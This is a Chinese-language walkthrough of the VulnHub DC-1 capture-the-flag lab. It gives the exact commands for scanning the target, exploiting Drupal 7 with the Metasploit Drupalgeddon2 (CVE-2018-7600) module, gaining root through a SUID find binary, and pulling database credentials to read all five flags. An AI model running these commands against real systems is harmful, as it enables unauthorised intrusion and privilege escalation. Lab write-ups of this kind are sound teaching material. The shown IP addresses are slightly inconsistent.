DC‑1 靶机完整渗透思路 + 详细步骤(可直接复现)
核心思路:信息收集 → Drupal 远程代码执行 → 拿 Webshell → 数据库信息利用 → SUID 提权 → 拿 Root 与全部 Flag
一、环境准备
- 攻击机:Kali Linux(NAT 模式)
- 靶机:DC‑1(VulnHub 下载,NAT 模式)
- 目标:拿下root 权限+ 找到5 个 flag
二、信息收集(定位靶机 + 端口服务)
1. 查看攻击机 IP
ifconfig2. 网段扫描找靶机 IP
arp-scan -l3. 端口与服务扫描
nmap -A -T4 192.168.146.133开放端口:
- 22/tcp SSH
- 80/tcp HTTP(Drupal 7 CMS)
- 111/tcp rpcbind
关键发现:80 端口跑 Drupal 7,存在 CVE‑2018‑7600(Drupalgeddon2)远程代码执行漏洞
三、漏洞利用(MSF 拿 Shell)
1. 启动 Metasploit
msfconsole2. 搜索并加载漏洞模块
search drupal # 选择第1个:exploit/unix/webapp/drupal_drupalgeddon2 use 13. 设置参数并执行
1. set rhosts 192.168.146.128 # 靶机IP 2. set lhost 192.168.46.133 # 攻击机IP 3. run成功拿到Meterpreter 会话,用户为www‑data(低权限)
四、升级交互式 Shell
1. shell 2. python -c "import pty;pty.spawn('/bin/bash')"得到稳定 bash:www-data@DC-1:/var/www$(这行命令是在渗透测试中,把一个 “残缺的反向 Shell 升级成交互式 Bash” 的经典操作)
💡 为什么要这么做?
你刚拿到的 Meterpreter / 反弹 Shell 有很多限制:
- 无法使用
su/sudo切换用户 - 无法运行
vim/top这类需要终端的程序 - 输入错误命令时,
Ctrl+C会直接把整个会话关掉 - 没有命令行历史记录、Tab 补全
执行这行命令后,你会得到一个稳定的交互式 Shell,能正常使用这些功能,后面提权、操作靶机都会顺畅很多。
五、SUID 提权(获取 root 权限)
查找带 SUID 权限的可执行文件
find / -perm -u=s -type f 2>/dev/null关键发现:
/usr/bin/find带有 SUID 权限,可用于提权。利用 find 命令提权
# 创建临时文件 touch test.txt # 利用find执行/bin/sh获取root shell find . -name test.txt -exec /bin/sh \; # 验证权限 whoami输出
root即提权成功,终端提示符变为#。
六、一次性获取全部 5 个 Flag
Flag 1(Web 根目录)
cd /var/www ls cat flag1.txtFlag 2(Drupal 配置文件)
# 进入配置文件目录 cd /var/www/sites/default/ # 精准查看数据库信息和flag2 grep -E "database|username|password|flag" settings.php文件中包含数据库账号密码,以及 Flag2 内容。
关键信息:
- 数据库名:
drupaldb - 用户名:
dbuser - 密码:
R0ck3t - 直接输出 flag2 内容
Flag 3(MySQL 数据库)
登录数据库
mysql -u dbuser -pR0ck3t drupaldb查看 users 表内容,获取 flag3
-- 查看所有表 show tables; -- 查看users表的完整内容(按行显示,方便阅读) select * from users\G输出内容中包含 flag3 的提示信息。
退出数据库
exit
Flag 4(普通用户目录)
cat /home/flag4/flag4.txt直接读取 flag4 内容。
Flag 5(Root 目录最终 Flag)
cat /root/thefinalflag.txt获取最终通关 Flag,内容为 DC-1 的通关祝贺信息。